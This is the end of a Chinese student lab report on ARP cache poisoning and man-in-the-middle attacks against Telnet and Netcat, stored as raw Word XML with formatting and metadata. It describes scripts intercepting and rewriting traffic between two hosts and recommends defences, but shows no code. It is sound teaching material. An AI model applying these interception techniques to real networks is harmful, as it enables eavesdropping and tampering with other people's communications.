          <w:p w14:paraId="4C5D439C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.sniff_and_spoof.py 脚本实施了中间人攻击，拦截 A 和 B 之间的 TCP 数据流，并在其上执行数据篡改操作。使 A 向 B 发送的数据被篡改（将 'FanLanlan' 替换为 'LanlanFan'）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CC4B4A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.当关闭 IP 转发（sysctl net.ipv4.ip_forward=0）时，M 将不再转发数据包。虽然 M 仍然可以拦截和篡改数据包，但由于不能将数据包转发到最终目的地，A 和 B 之间的通信会中断，导致连接失败或不稳定。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A709EDA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4.在 A 发送的数据到达 B 之前，它被 M 拦截并篡改。B 显示的数据是篡改后的结果，而不是原始数据。在 M 上，数据的原始内容和篡改后的内容。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="158CE843"/>
    <w:p w14:paraId="5A3CE99A"/>
    <w:p w14:paraId="2A0BF76D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65615CCA">
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过这次实验，我的知识储备更加丰富，我认识到ARP 协议本身没有认证机制，使其容易受到 ARP 欺骗攻击。攻击者可以通过伪造 ARP 报文来干扰目标设备的 ARP 缓存，从而劫持网络流量。关闭 IP 转发功能后，网络流量无法正常转发，导致通信中断。此操作可以防止数据包的进一步传播，但不能阻止数据包的拦截和篡改。中间人攻击可以在通信双方之间插入恶意节点，拦截并篡改数据。有效的中间人攻击展示了在网络通信中的数据安全风险。为防止 ARP 欺骗攻击，应考虑使用静态 ARP 表、ARP 监控工具和网络层的安全协议（如 IPsec）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B0ED46">
      <w:pPr>
        <w:pStyle w:val="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在操作上，在Task 2: MITM Attack on Telnet using ARP Cache Poisoning中的第三各任务，我想要将所有的字母替换为“f”，第一次尝试时失败了，于是我又尝试了一次成功了，查阅资料得知，使用python进行MITM或许有可能是受限于虚拟机的效率，或在真实环境下的网络波动都会造成一定程度的延迟。所有，第一次是延迟问题。而该延迟问题可以让受害者双方判断攻击与否。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD3A693">
      <w:pPr>
        <w:pStyle w:val="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在Task 3: MITM Attack on Netcat using ARP Cache Poisoning中，我一开始进行“Lanlanfan”到“Fanlanlan”的替换时失败了，原因是没有一直让arp.py保持运行状态，当我让其保持运行状态后，替换完成了。查阅资料得知，在进行中间人攻击时，保持 ARP 欺骗脚本（如 arp.py）持续运行是关键，因为它确保目标设备（A 和 B）的 ARP 缓存持续保持伪造的 IP-MAC 映射。它避免了 ARP 缓存超时导致的流量绕过攻击者，使得数据包拦截和篡改可以持续进行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792C0D6D"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5457AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="035457A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F2E0C9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F2E0C9D"/>
    <w:lvl w:ilvl="0" w:tentative="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30B52F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="130B52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2B5E6E4F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B5E6E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2E912606"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E91260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39146841"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="391468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52B2C96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="552B2C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56E5579D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56E5579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573A11C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="573A11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5C3117C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C3117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64FE4016"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64FE401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9"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10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019"/>
    <w:rsid w:val="000257CB"/>
    <w:rsid w:val="0003737E"/>
    <w:rsid w:val="00037894"/>
    <w:rsid w:val="00050E23"/>
    <w:rsid w:val="00056CA8"/>
    <w:rsid w:val="00062D70"/>
    <w:rsid w:val="00070855"/>
    <w:rsid w:val="000A5B3F"/>
    <w:rsid w:val="000A657D"/>
    <w:rsid w:val="00105D69"/>
    <w:rsid w:val="00120178"/>
    <w:rsid w:val="001379EC"/>
    <w:rsid w:val="00140B2F"/>
    <w:rsid w:val="00140E96"/>
    <w:rsid w:val="00142C41"/>
    <w:rsid w:val="00164C5B"/>
    <w:rsid w:val="0017447E"/>
    <w:rsid w:val="001E73EE"/>
    <w:rsid w:val="001F23E6"/>
    <w:rsid w:val="002062CA"/>
    <w:rsid w:val="002243F8"/>
    <w:rsid w:val="00277AAB"/>
    <w:rsid w:val="00277CB0"/>
    <w:rsid w:val="0028364F"/>
    <w:rsid w:val="002C365D"/>
    <w:rsid w:val="002F05EC"/>
    <w:rsid w:val="003248DD"/>
    <w:rsid w:val="00330921"/>
    <w:rsid w:val="003329CA"/>
    <w:rsid w:val="003765B9"/>
    <w:rsid w:val="003C0745"/>
    <w:rsid w:val="003D7AC8"/>
    <w:rsid w:val="00424FF1"/>
    <w:rsid w:val="004320E6"/>
    <w:rsid w:val="00446019"/>
    <w:rsid w:val="00446426"/>
    <w:rsid w:val="004576D8"/>
    <w:rsid w:val="00471802"/>
    <w:rsid w:val="0048659C"/>
    <w:rsid w:val="004B0680"/>
    <w:rsid w:val="004B6851"/>
    <w:rsid w:val="004D0119"/>
    <w:rsid w:val="004D361C"/>
    <w:rsid w:val="004D557A"/>
    <w:rsid w:val="004E06DA"/>
    <w:rsid w:val="004E1C06"/>
    <w:rsid w:val="00537F4C"/>
    <w:rsid w:val="0054643F"/>
    <w:rsid w:val="00557CF6"/>
    <w:rsid w:val="005622D1"/>
    <w:rsid w:val="00591B29"/>
    <w:rsid w:val="005A7E29"/>
    <w:rsid w:val="005B03AA"/>
    <w:rsid w:val="005C4429"/>
    <w:rsid w:val="005D3C84"/>
    <w:rsid w:val="005E50BA"/>
    <w:rsid w:val="005F2B7D"/>
    <w:rsid w:val="00612DBD"/>
    <w:rsid w:val="00632AEF"/>
    <w:rsid w:val="006505A8"/>
    <w:rsid w:val="00672628"/>
    <w:rsid w:val="00677D5C"/>
    <w:rsid w:val="006941BC"/>
    <w:rsid w:val="006A328E"/>
    <w:rsid w:val="006A66EA"/>
    <w:rsid w:val="006D4DF1"/>
    <w:rsid w:val="006E22F1"/>
    <w:rsid w:val="00716FB9"/>
    <w:rsid w:val="00730570"/>
    <w:rsid w:val="007339A7"/>
    <w:rsid w:val="00737661"/>
    <w:rsid w:val="007472E0"/>
    <w:rsid w:val="007473CA"/>
    <w:rsid w:val="007633BB"/>
    <w:rsid w:val="00765548"/>
    <w:rsid w:val="007761F7"/>
    <w:rsid w:val="007B72A3"/>
    <w:rsid w:val="007E4693"/>
    <w:rsid w:val="007F367F"/>
    <w:rsid w:val="008072D5"/>
    <w:rsid w:val="00815607"/>
    <w:rsid w:val="0084186C"/>
    <w:rsid w:val="00855F33"/>
    <w:rsid w:val="0086205F"/>
    <w:rsid w:val="00894294"/>
    <w:rsid w:val="00896B96"/>
    <w:rsid w:val="008B6910"/>
    <w:rsid w:val="008C2B90"/>
    <w:rsid w:val="008D27AB"/>
    <w:rsid w:val="008D798D"/>
    <w:rsid w:val="008E19B6"/>
    <w:rsid w:val="008F138B"/>
    <w:rsid w:val="008F229C"/>
    <w:rsid w:val="00901129"/>
    <w:rsid w:val="00921A6F"/>
    <w:rsid w:val="00923297"/>
    <w:rsid w:val="0093373E"/>
    <w:rsid w:val="009456C3"/>
    <w:rsid w:val="009571A0"/>
    <w:rsid w:val="0096330B"/>
    <w:rsid w:val="00963574"/>
    <w:rsid w:val="00974E3D"/>
    <w:rsid w:val="0099672D"/>
    <w:rsid w:val="009A24F8"/>
    <w:rsid w:val="009A3B1D"/>
    <w:rsid w:val="009B3B41"/>
    <w:rsid w:val="009B590A"/>
    <w:rsid w:val="009C67D9"/>
    <w:rsid w:val="009D1F6F"/>
    <w:rsid w:val="009F054A"/>
    <w:rsid w:val="009F5AAE"/>
    <w:rsid w:val="00A027B2"/>
    <w:rsid w:val="00A044DC"/>
    <w:rsid w:val="00A17B6E"/>
    <w:rsid w:val="00A378B2"/>
    <w:rsid w:val="00A546F1"/>
    <w:rsid w:val="00A92061"/>
    <w:rsid w:val="00AA2747"/>
    <w:rsid w:val="00AC0698"/>
    <w:rsid w:val="00AC4C75"/>
    <w:rsid w:val="00AC5A04"/>
    <w:rsid w:val="00AD0B3C"/>
    <w:rsid w:val="00B14A4E"/>
    <w:rsid w:val="00B41279"/>
    <w:rsid w:val="00B5703F"/>
    <w:rsid w:val="00B7131A"/>
    <w:rsid w:val="00B80FFD"/>
    <w:rsid w:val="00B82B2B"/>
    <w:rsid w:val="00BB7E0B"/>
    <w:rsid w:val="00BC6C7F"/>
    <w:rsid w:val="00BD7949"/>
    <w:rsid w:val="00C0592A"/>
    <w:rsid w:val="00C20B7C"/>
    <w:rsid w:val="00C32E60"/>
    <w:rsid w:val="00C723C1"/>
    <w:rsid w:val="00CD3B10"/>
    <w:rsid w:val="00D16060"/>
    <w:rsid w:val="00D20DFF"/>
    <w:rsid w:val="00DB14FD"/>
    <w:rsid w:val="00DC34C8"/>
    <w:rsid w:val="00DD736E"/>
    <w:rsid w:val="00DE1FB5"/>
    <w:rsid w:val="00E01D1F"/>
    <w:rsid w:val="00E22FCB"/>
    <w:rsid w:val="00E23A44"/>
    <w:rsid w:val="00E6169B"/>
    <w:rsid w:val="00E62500"/>
    <w:rsid w:val="00E65EDC"/>
    <w:rsid w:val="00E83ABF"/>
    <w:rsid w:val="00EA0233"/>
    <w:rsid w:val="00EB23E3"/>
    <w:rsid w:val="00EC6145"/>
    <w:rsid w:val="00ED6A25"/>
    <w:rsid w:val="00EF11EC"/>
    <w:rsid w:val="00EF5A22"/>
    <w:rsid w:val="00EF605F"/>
    <w:rsid w:val="00F03B86"/>
    <w:rsid w:val="00F077E5"/>
    <w:rsid w:val="00F12310"/>
    <w:rsid w:val="00F170C1"/>
    <w:rsid w:val="00F2225F"/>
    <w:rsid w:val="00F80A40"/>
    <w:rsid w:val="00F8709F"/>
    <w:rsid w:val="00F96A02"/>
    <w:rsid w:val="00FB149D"/>
    <w:rsid w:val="00FC1930"/>
    <w:rsid w:val="00FF63DA"/>
    <w:rsid w:val="6324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2">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="3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793</Words>
  <Characters>1536</Characters>
  <Lines>69</Lines>
  <Paragraphs>19</Paragraphs>
  <TotalTime>9</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1688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2024-09-02T08:57:00Z</dcterms:created>
  <dc:creator>Microsoft Office User</dc:creator>
  <cp:lastModifiedBy>我是一颗小白菜</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-30T06:38:58Z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eyJoZGlkIjoiN2YzNjBkOTgyNWQ1YTMxYzM3MzMwNWFiODNmOWIzYWMiLCJ1c2VySWQiOiIxNjE2NTYxNzU1In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.20305</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>FC76576C624A40D6B5DDD7441DB66EE5_12</vt:lpwstr>
  </property>
</Properties>
</file>